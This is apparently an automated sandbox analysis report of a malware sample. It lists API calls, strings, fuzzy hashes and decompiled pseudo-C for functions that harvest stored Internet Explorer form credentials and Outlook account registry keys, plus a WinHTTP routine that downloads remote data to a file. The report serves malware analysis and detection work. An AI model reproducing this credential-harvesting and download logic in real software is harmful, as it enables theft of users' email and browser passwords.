Strings

wEGGOW%E, xrefs: 001F773C
Y+6, xrefs: 001F747B

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseDeallocateH_prologOpenQueryValue
String ID: Y+6$wEGGOW%E
API String ID: 2130659939-258343349
Opcode ID: 32085e18b61f7ff8a69b1cf771a70150eb635b548c09407179fd618e019a5ff6
Instruction ID: 02bf1a857184e5e96939c4cd933273a46bc5d54f4432d0f1bdd746860be0ada5
Opcode Fuzzy Hash: 32085e18b61f7ff8a69b1cf771a70150eb635b548c09407179fd618e019a5ff6
Instruction Fuzzy Hash: F1D10670D1834C9AEF16DFA8D885BFEBBB8AF25300F10411EE556A72C2DB745648CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001F592B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,00000000,00000000,?), ref: 001F5973
RegQueryValueExW.KERNEL32(00000100,?,00000000,00000000,00000000,?), ref: 001F5992
RegQueryValueExW.KERNEL32(00000100,?,00000000,00000000,00000000,?), ref: 001F59CD
RegCloseKey.ADVAPI32(00000100), ref: 001F59EE

Part of subcall function 00205A55: _free.LIBCMT ref: 00205A68

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 001F5971

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue$CloseOpen_free
String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 3744367872-680441574
Opcode ID: 743e748899b6b7ef7998e86da816e1ca501388b6827cb36e104eeaa0006c5c75
Instruction ID: cdc8b53d0a8e5e70b2bdc714163b7212526dc2a5f576f3ee304c0792eb4cf651
Opcode Fuzzy Hash: 743e748899b6b7ef7998e86da816e1ca501388b6827cb36e104eeaa0006c5c75
Instruction Fuzzy Hash: 1F317C71A00A0DFBEF248E51DC85FBA77AAFB44768F108015FF04AA151D371DE159B60

Uniqueness

Uniqueness Score: -1.00%

Function 001EA224, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0022DB80,00000000,00000015,0022DBA0,?), ref: 001EA244
StrStrIW.SHLWAPI(?,0023C394), ref: 001EA295
CoTaskMemFree.OLE32(?), ref: 001EA2B3
CoTaskMemFree.OLE32(?), ref: 001EA2C1

Strings

(, xrefs: 001EA279

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: (
API String ID: 2903366249-3887548279
Opcode ID: c29447afe803398a7e65649c0927800feb030d813b36fc0ade9b499a19187fff
Instruction ID: 0337bb996e05e23ec029c695f211b177b93822e38dbeb5c742df684dd9d01a8c
Opcode Fuzzy Hash: c29447afe803398a7e65649c0927800feb030d813b36fc0ade9b499a19187fff
Instruction Fuzzy Hash: 62212774A00209EFCB04DFE9E884D9DBBB9FF48704B508069F505E7250CB31AD44CB11

Uniqueness

Uniqueness Score: -1.00%

Function 001FEFDD, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(000000FF,?,001D4748,?,7FFFFFFF,?,?,?,?,?,?,001D35B9,?,00000000,?,001DA559), ref: 001FEFE9
FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,001D4748,?,7FFFFFFF,?,?,?), ref: 001FF019
GetLastError.KERNEL32(?,?,?,?,001D4748,?,7FFFFFFF,?,?,?,?,?,?,001D35B9,?,00000000), ref: 001FF026
FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,001D4748,?,7FFFFFFF,?,?,?), ref: 001FF040
GetLastError.KERNEL32(?,?,?,?,001D4748,?,7FFFFFFF,?,?,?,?,?,?,001D35B9,?,00000000), ref: 001FF04D

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$ErrorFileFirstLast$Close
String ID:
API String ID: 569926201-0
Opcode ID: 8c8522790e1851c4ca4f62ca7071510a2b7e2d4f29022a046eb9c4e5c33b356a
Instruction ID: 38314add8a03201fd648366ff349a3107e1a84491fecb91a5978ff01b7304c4f
Opcode Fuzzy Hash: 8c8522790e1851c4ca4f62ca7071510a2b7e2d4f29022a046eb9c4e5c33b356a
Instruction Fuzzy Hash: E301003500018DBBCB301FA5EC4CCAB7FAAEFD1761B144629FB69850B1DB718962D660

Uniqueness

Uniqueness Score: -1.00%

Function 001F71FA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001F71FF
GetTimeZoneInformation.KERNEL32(?,74B624D0,00000000), ref: 001F721C

Part of subcall function 001D2BD9: __EH_prolog.LIBCMT ref: 001D2BDE

Part of subcall function 001D3337: __EH_prolog.LIBCMT ref: 001D333C
Part of subcall function 001D3337: std::locale::_Init.LIBCPMT ref: 001D335A

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001F736A

Strings

T, xrefs: 001F731F

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
String ID: T
API String ID: 3259846166-3187964512
Opcode ID: 6d7c2134938bfc33d1c8215575593915032538ce3269fc10e59d6ce41bef9c47
Instruction ID: badf876463c4e05532b3337a3af527dd42327900c0ed70f5f1ba306b41b9badf
Opcode Fuzzy Hash: 6d7c2134938bfc33d1c8215575593915032538ce3269fc10e59d6ce41bef9c47
Instruction Fuzzy Hash: A14179B0D0435C9BCB55DFA8D889BEEBBB5AF59304F1081AAD409B7241EB701A89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001F49A2, Relevance: 4.6, APIs: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,001F5361,00000001,?,?,?,001F549A), ref: 001F49E3
GetProcAddress.KERNEL32(00000000,?), ref: 001F4A20
FreeLibrary.KERNELBASE(00000000,?,?,00000000,?,?,?,001F5361,00000001,?,?,?,001F549A), ref: 001F4A54

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID:
API String ID: 145871493-0
Opcode ID: 3db2f1658fa8c9f992ab7f14386eb37c3cfd4c3930f25f3a0991a83841f2f1c3
Instruction ID: 73e169ace20245d8ae41709b88fc7b4cf9102eea67ba5719ca53d835320d3e9f
Opcode Fuzzy Hash: 3db2f1658fa8c9f992ab7f14386eb37c3cfd4c3930f25f3a0991a83841f2f1c3
Instruction Fuzzy Hash: 1921F674A1424DEF9B05CFE8A8648FFFBB9EE99304B14506DD956B3201DB708A06C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00206C01, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00206C00,?,?,?,?,?,001DA54C), ref: 00206C23
TerminateProcess.KERNEL32(00000000,?,00206C00,?,?,?,?,?,001DA54C), ref: 00206C2A
ExitProcess.KERNEL32 ref: 00206C3C

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e1095573887217e87107cb34ed751a9d8acf24c5fbc3c63a47f79bae7214cf59
Instruction ID: 30616d53e9deca4ff3ca4e4b1023490618a6d3f49cc11a2b96434d57d7b42b17
Opcode Fuzzy Hash: e1095573887217e87107cb34ed751a9d8acf24c5fbc3c63a47f79bae7214cf59
Instruction Fuzzy Hash: 07E04632020208FFCB216FA4ED4CA483B69EB40341B044015F80486132CB35EEA3CA84

Uniqueness

Uniqueness Score: -1.00%

Function 001F44AA, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 276
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E001F44AA(intOrPtr* __ecx, CHAR** __edx) {
				void* __edi;
				void* __esi;
				long _t95;
				void* _t98;
				long _t105;
				void* _t106;
				intOrPtr* _t114;
				long _t115;
				intOrPtr* _t121;
				long _t122;
				long _t126;
				long _t136;
				intOrPtr* _t141;
				intOrPtr* _t148;
				void* _t151;
				long _t154;
				long _t156;
				void* _t157;
				signed char _t159;
				void* _t168;
				void* _t172;
				struct _SECURITY_ATTRIBUTES* _t183;
				void* _t188;
				intOrPtr* _t189;
				long _t191;
				void* _t192;
				void* _t193;
				long _t195;
				long _t197;
				void* _t198;
				void* _t200;
				void* _t201;
				void* _t202;

				L00227790(0x22a883, _t198);
				_t201 = _t200 - 0x290;
				 *((intOrPtr*)(_t198 - 0x8c)) = 0xf;
				 *((intOrPtr*)(_t198 - 0xa0)) = 0;
				_t194 = __edx;
				_t189 = __ecx;
				 *((intOrPtr*)(_t198 - 0x90)) = 0;
				 *((char*)(_t198 - 0xa0)) = 0;
				 *(_t198 - 4) = 0;
				 *(_t198 - 0x10) = 0;
				 *((intOrPtr*)(_t198 - 0x28)) = 0;
				_t95 =  *0x22d330(0, 0, 0, 0, 0, _t188, _t193, _t151); // executed
				 *(_t198 - 0x20) = _t95;
				if(__edx[5] >= 0x10) {
					_t194 =  *__edx;
				}
				_t98 = CreateFileA(_t194, 0xc0000000, 1, 0, 2, 0x80, 0); // executed
				 *(_t198 - 0x24) = _t98;
				if( *((intOrPtr*)(_t189 + 0x14)) >= 0x10) {
					_t189 =  *_t189;
				}
				_push(_t198 - 0x29c);
				_push(_t198 - 0x1d4);
				E001F385D(_t189, "%99[^:]://%99[^/]%99[^\n]", _t198 - 0xac);
				_t202 = _t201 + 0x14;
				 *(_t198 - 0x18) = 0xceced245;
				_t159 = 0x45;
				 *((short*)(_t198 - 0x14)) = 0xc9ca;
				 *((char*)(_t198 - 0x12)) = 0;
				_t183 = 0;
				while(1) {
					 *(_t198 + _t183 - 0x17) =  *(_t198 + _t183 - 0x17) ^  !_t159;
					_t183 =  &(_t183->nLength);
					if(_t183 >= 5) {
						break;
					}
					_t159 =  *(_t198 - 0x18);
				}
				 *((char*)(_t198 - 0x12)) = 0;
				_t105 = E002053B0(_t198 - 0xac, _t198 - 0x17);
				_t195 =  *(_t198 - 0x20);
				__eflags = _t105;
				_t106 = 1;
				_t154 =  ==  ? _t106 : 0;
				__eflags = _t195;
				if(_t195 != 0) {
					__eflags = _t154;
					if(_t154 == 0) {
						 *((intOrPtr*)(_t198 - 0x58)) = 0;
						 *((intOrPtr*)(_t198 - 0x48)) = 0;
						 *((char*)(_t198 - 0x58)) = 0;
						 *((intOrPtr*)(_t198 - 0x44)) = 0xf;
						L001D2F8E(_t198 - 0x1d4);
						 *(_t198 - 4) = 2;
						_t114 = E001F8C60(_t198 - 0xdc, _t198 - 0x58);
						__eflags =  *((intOrPtr*)(_t114 + 0x14)) - 8;
						if( *((intOrPtr*)(_t114 + 0x14)) >= 8) {
							_t114 =  *_t114;
						}
						_t115 =  *0x22d320(_t195, _t114, 0x50, 0);
						 *(_t198 - 0x1c) = _t115;
						_t191 = _t115;
						E001D2D4F(_t198 - 0xdc);
						_t168 = _t198 - 0x58;
					} else {
						 *((intOrPtr*)(_t198 - 0x40)) = 0;
						 *((intOrPtr*)(_t198 - 0x30)) = 0;
						 *((char*)(_t198 - 0x40)) = 0;
						 *((intOrPtr*)(_t198 - 0x2c)) = 0xf;
						L001D2F8E(_t198 - 0x1d4);
						 *(_t198 - 4) = 1;
						_t148 = E001F8C60(_t198 - 0xc4, _t198 - 0x40);
						__eflags =  *((intOrPtr*)(_t148 + 0x14)) - 8;
						if( *((intOrPtr*)(_t148 + 0x14)) >= 8) {
							_t148 =  *_t148;
						}
						_t191 =  *0x22d320(_t195, _t148, 0x1bb, 0);
						 *(_t198 - 0x1c) = _t191;
						E001D2D4F(_t198 - 0xc4);
						_t168 = _t198 - 0x40;
					}
					 *(_t198 - 4) = 0;
					E001D2F2D(_t168);
					__eflags = _t191;
					if(_t191 != 0) {
						_push(_t198 - 0x29c);
						__eflags = _t154;
						if(_t154 == 0) {
							_t156 = 0;
							 *((intOrPtr*)(_t198 - 0x74)) = 0xf;
							 *((intOrPtr*)(_t198 - 0x88)) = 0;
							 *((intOrPtr*)(_t198 - 0x78)) = 0;
							 *((char*)(_t198 - 0x88)) = 0;
							L001D2F8E();
							 *(_t198 - 4) = 4;
							_t121 = E001F8C60(_t198 - 0x10c, _t198 - 0x88);
							__eflags =  *((intOrPtr*)(_t121 + 0x14)) - 8;
							if( *((intOrPtr*)(_t121 + 0x14)) >= 8) {
								_t121 =  *_t121;
							}
							_t122 =  *0x22d328(_t191, L"GET", _t121, _t156, _t156, _t156, 0x100); // executed
							_t197 = _t122;
							E001D2D4F(_t198 - 0x10c);
							_t172 = _t198 - 0x88;
						} else {
							_t156 = 0;
							 *((intOrPtr*)(_t198 - 0x5c)) = 0xf;
							 *((intOrPtr*)(_t198 - 0x70)) = 0;
							 *((intOrPtr*)(_t198 - 0x60)) = 0;
							 *((char*)(_t198 - 0x70)) = 0;
							L001D2F8E();
							 *(_t198 - 4) = 3;
							_t141 = E001F8C60(_t198 - 0xf4, _t198 - 0x70);
							__eflags =  *((intOrPtr*)(_t141 + 0x14)) - 8;
							if( *((intOrPtr*)(_t141 + 0x14)) >= 8) {
								_t141 =  *_t141;
							}
							_t197 =  *0x22d328(_t191, L"GET", _t141, _t156, _t156, _t156, E00800100);
							E001D2D4F(_t198 - 0xf4);
							_t172 = _t198 - 0x70;
						}
						 *(_t198 - 4) = _t156;
						E001D2F2D(_t172);
						__eflags = _t197;
						if(_t197 != 0) {
							_t126 =  *0x22d31c(_t197, _t156, _t156, _t156, _t156, _t156, _t156); // executed
							__eflags = _t126;
							if(_t126 == 0) {
								GetLastError();
							} else {
								__eflags =  *0x22d338(_t197, _t156);
								if(__eflags != 0) {
									_t192 =  *(_t198 - 0x24);
									do {
										 *(_t198 - 0x10) = _t156;
										 *0x22d324(_t197, _t198 - 0x10); // executed
										_t157 = E00200588(_t197, __eflags,  *(_t198 - 0x10) + 1);
										E00202C70(_t192, _t157, 0,  *(_t198 - 0x10) + 1);
										_t202 = _t202 + 0x10;
										_t136 =  *0x22d33c(_t197, _t157,  *(_t198 - 0x10), _t198 - 0x28);
										__eflags = _t136;
										if(_t136 != 0) {
											WriteFile(_t192, _t157,  *(_t198 - 0x10), _t198 - 0x18, 0); // executed
										}
										L002001B3(_t157);
										__eflags =  *(_t198 - 0x10);
										_t156 = 0;
									} while (__eflags > 0);
									_t191 =  *(_t198 - 0x1c);
								}
							}
						}
						 *0x22d32c(_t197);
						_t195 =  *(_t198 - 0x20);
					}
					 *0x22d32c(_t191);
				}
				CloseHandle( *(_t198 - 0x24));
				 *0x22d32c(_t195);
				E001D2F2D(_t198 - 0xa0);
				__eflags = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t198 - 0xc));
				return 0;
			}

0x001f44af
0x001f44b4
0x001f44bd
0x001f44c9
0x001f44cf
0x001f44d1
0x001f44d3
0x001f44d9
0x001f44e3
0x001f44e7
0x001f44ea
0x001f44ed
0x001f44f7
0x001f44fa
0x001f44fc
0x001f44fc
0x001f4511
0x001f451b
0x001f451e
0x001f4520
0x001f4520
0x001f4528
0x001f452f
0x001f453d
0x001f4542
0x001f4545
0x001f454c
0x001f454e
0x001f4554
0x001f4557
0x001f4559
0x001f455b
0x001f455f
0x001f4563
0x00000000
0x00000000
0x001f4565
0x001f4565
0x001f456d
0x001f4578
0x001f457d
0x001f4580
0x001f4589
0x001f458a
0x001f458d
0x001f458f
0x001f4597
0x001f4599
0x001f45fa
0x001f4600
0x001f4603
0x001f460d
0x001f4614
0x001f461c
0x001f4626
0x001f462b
0x001f462f
0x001f4631
0x001f4631
0x001f4639
0x001f4645
0x001f4648
0x001f464a
0x001f464f
0x001f459b
0x001f459b
0x001f45a1
0x001f45a4
0x001f45ae
0x001f45b5
0x001f45c6
0x001f45c9
0x001f45ce
0x001f45d2
0x001f45d4
0x001f45d4
0x001f45e5
0x001f45ed
0x001f45f0
0x001f45f5
0x001f45f5
0x001f4652
0x001f4656
0x001f465b
0x001f465d
0x001f4669
0x001f466a
0x001f466c
0x001f46c9
0x001f46cb
0x001f46d2
0x001f46de
0x001f46e1
0x001f46e7
0x001f46f2
0x001f46fc
0x001f4701
0x001f4705
0x001f4707
0x001f4707
0x001f4718
0x001f4724
0x001f4726
0x001f472b
0x001f466e
0x001f466e
0x001f4670
0x001f4677
0x001f467d
0x001f4680
0x001f4683
0x001f468b
0x001f4695
0x001f469a
0x001f469e
0x001f46a0
0x001f46a0
0x001f46bd
0x001f46bf
0x001f46c4
0x001f46c4
0x001f4731
0x001f4734
0x001f4739
0x001f473b
0x001f4748
0x001f474e
0x001f4750
0x001f47c4
0x001f4752
0x001f475a
0x001f475c
0x001f475e
0x001f4761
0x001f4764
0x001f4769
0x001f477c
0x001f4783
0x001f4788
0x001f4794
0x001f479a
0x001f479c
0x001f47a9
0x001f47a9
0x001f47b0
0x001f47b5
0x001f47bc
0x001f47bc
0x001f47bf
0x001f47bf
0x001f475c
0x001f4750
0x001f47cb
0x001f47d1
0x001f47d1
0x001f47d5
0x001f47d5
0x001f47de
0x001f47e5
0x001f47f1
0x001f47f9
0x001f47fe
0x001f4806

APIs

__EH_prolog.LIBCMT ref: 001F44AF
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00248780,0000000F), ref: 001F44ED
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 001F4511
WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?), ref: 001F45DF

Part of subcall function 001F8C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,001F462B,?), ref: 001F8C85
Part of subcall function 001F8C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,001F462B,?), ref: 001F8CCC

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?), ref: 001F4639
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 001F46B1
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 001F4718
WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001F4748
WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 001F4754
WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 001F4769
WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 001F4794
WriteFile.KERNEL32(?,00000000,?,CECED245,00000000), ref: 001F47A9
GetLastError.KERNEL32 ref: 001F47C4
WinHttpCloseHandle.WINHTTP(00000000), ref: 001F47CB
WinHttpCloseHandle.WINHTTP(00000000), ref: 001F47D5
CloseHandle.KERNEL32(?), ref: 001F47DE
WinHttpCloseHandle.WINHTTP(?), ref: 001F47E5

Strings

GET, xrefs: 001F46AB, 001F4712
%99[^:]://%99[^/]%99[^], xrefs: 001F4537

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
String ID: %99[^:]://%99[^/]%99[^]$GET
API String ID: 4006077129-3478069819
Opcode ID: 05b71cdc2daf3d72953362e6195518914c7db3be1707d81c3a6b1f6ff27fd231
Instruction ID: 45cc9fc510263474f8e68a8ff8ddf278932cc3dfd579c81bdbb80a3894797199
Opcode Fuzzy Hash: 05b71cdc2daf3d72953362e6195518914c7db3be1707d81c3a6b1f6ff27fd231
Instruction Fuzzy Hash: 2DA157B1801259AFDB21EFA4DC88BEEBBB8FF15300F1041A9E505A7251DB749E49CF61

Uniqueness

Uniqueness Score: -1.00%

Function 001F5346, Relevance: 24.1, APIs: 3, Strings: 13, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E001F5346(void* __edi, void* __eflags) {
				char _v8;
				void* __ecx;
				char* _t19;
				WCHAR* _t23;
				void* _t43;
				WCHAR* _t45;
				void* _t48;
				void* _t53;
				WCHAR* _t73;
				intOrPtr* _t75;
				intOrPtr* _t76;

				_t19 = E00206832();
				_v8 = _t19;
				 *_t19 = 0; // executed
				E001F49A2( &_v8); // executed
				 *_t75 = L"Software\\Microsoft\\Internet Account Manager\\Accounts"; // executed
				E001F4E00( &_v8, 1); // executed
				 *_t75 = L"\\Software\\Microsoft\\Internet Account Manager\\Accounts";
				E001F4ECD( &_v8, L"Identities", _t43); // executed
				_t53 = _t48;
				_t23 = E001F592B(0x80000002, L"Software\\Microsoft\\Internet Account Manager", L"Outlook", 0, _t53, 0); // executed
				_t45 = _t23;
				_t76 = _t75 + 0x10;
				if(_t45 != 0) {
					_push(0x14 + lstrlenW(_t45) * 2);
					_t73 = E00206832();
					lstrcpyW(_t73, _t45);
					lstrcpyW(_t73, L"\\Accounts");
					E001F4E00( &_v8, _t45); // executed
					E00205A55(_t73);
				}
				E00205A55(_t45);
				 *_t76 = L"Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"; // executed
				E001F4E00( &_v8); // executed
				E001F4ECD( &_v8, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", 0); // executed
				E001F4ECD( &_v8, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", 0); // executed
				E001F4ECD( &_v8, L"Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook", 0); // executed
				E001F4ECD( &_v8, L"Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook", 0); // executed
				E001F4ECD( &_v8, L"Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook", 0); // executed
				E001F4ECD( &_v8, L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", 0); // executed
				E001F4ECD( &_v8, L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", 0); // executed
				E001F4ECD( &_v8, L"Software\\Microsoft\\Office\\14.0\\Outlook\\Profiles\\Outlook", 0); // executed
				E001F4ECD( &_v8, L"Software\\Microsoft\\Office\\13.0\\Outlook\\Profiles\\Outlook", 0); // executed
				return _v8;
			}

0x001f534d
0x001f5352
0x001f535a
0x001f535c
0x001f5364
0x001f536b
0x001f5370
0x001f537f
0x001f5385
0x001f5398
0x001f539d
0x001f539f
0x001f53a4
0x001f53b5
0x001f53bc
0x001f53c0
0x001f53cc
0x001f53d6
0x001f53dc
0x001f53e3
0x001f53e5
0x001f53ed
0x001f53f4
0x001f5404
0x001f5412
0x001f5420
0x001f542e
0x001f543c
0x001f544a
0x001f5458
0x001f5466
0x001f5477
0x001f5483

APIs

Part of subcall function 001F49A2: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,001F5361,00000001,?,?,?,001F549A), ref: 001F49E3
Part of subcall function 001F49A2: GetProcAddress.KERNEL32(00000000,?), ref: 001F4A20
Part of subcall function 001F49A2: FreeLibrary.KERNELBASE(00000000,?,?,00000000,?,?,?,001F5361,00000001,?,?,?,001F549A), ref: 001F4A54

Part of subcall function 001F4E00: RegOpenKeyExW.KERNEL32(80000001,001F549A,00000000,00020019,001F549A,?,?,001F5370,00000001,?,?,?,001F549A), ref: 001F4E25
Part of subcall function 001F4E00: RegEnumKeyExW.ADVAPI32(001F549A,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,001F5370,00000001), ref: 001F4EB6
Part of subcall function 001F4E00: RegCloseKey.ADVAPI32(001F549A,?,?,001F5370,00000001,?,?,?,001F549A), ref: 001F4EC3

Part of subcall function 001F4ECD: RegOpenKeyExW.KERNEL32(80000001,001F549A,00000000,00020019,001F549A,?,?,?,001F5384,Identities,00000001,?,?,?,001F549A), ref: 001F4EF4
Part of subcall function 001F4ECD: RegEnumKeyExW.ADVAPI32(001F549A,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,001F5384,Identities,00000001), ref: 001F4F1F
Part of subcall function 001F4ECD: lstrlenW.KERNEL32(001F549A,00000000,?,?,?,001F5384,Identities,00000001,?,?,?,001F549A), ref: 001F4F36
Part of subcall function 001F4ECD: lstrlenW.KERNEL32(?,00000000,?,?,?,001F5384,Identities,00000001,?,?,?,001F549A), ref: 001F4F43
Part of subcall function 001F4ECD: lstrcpyW.KERNEL32 ref: 001F4F64
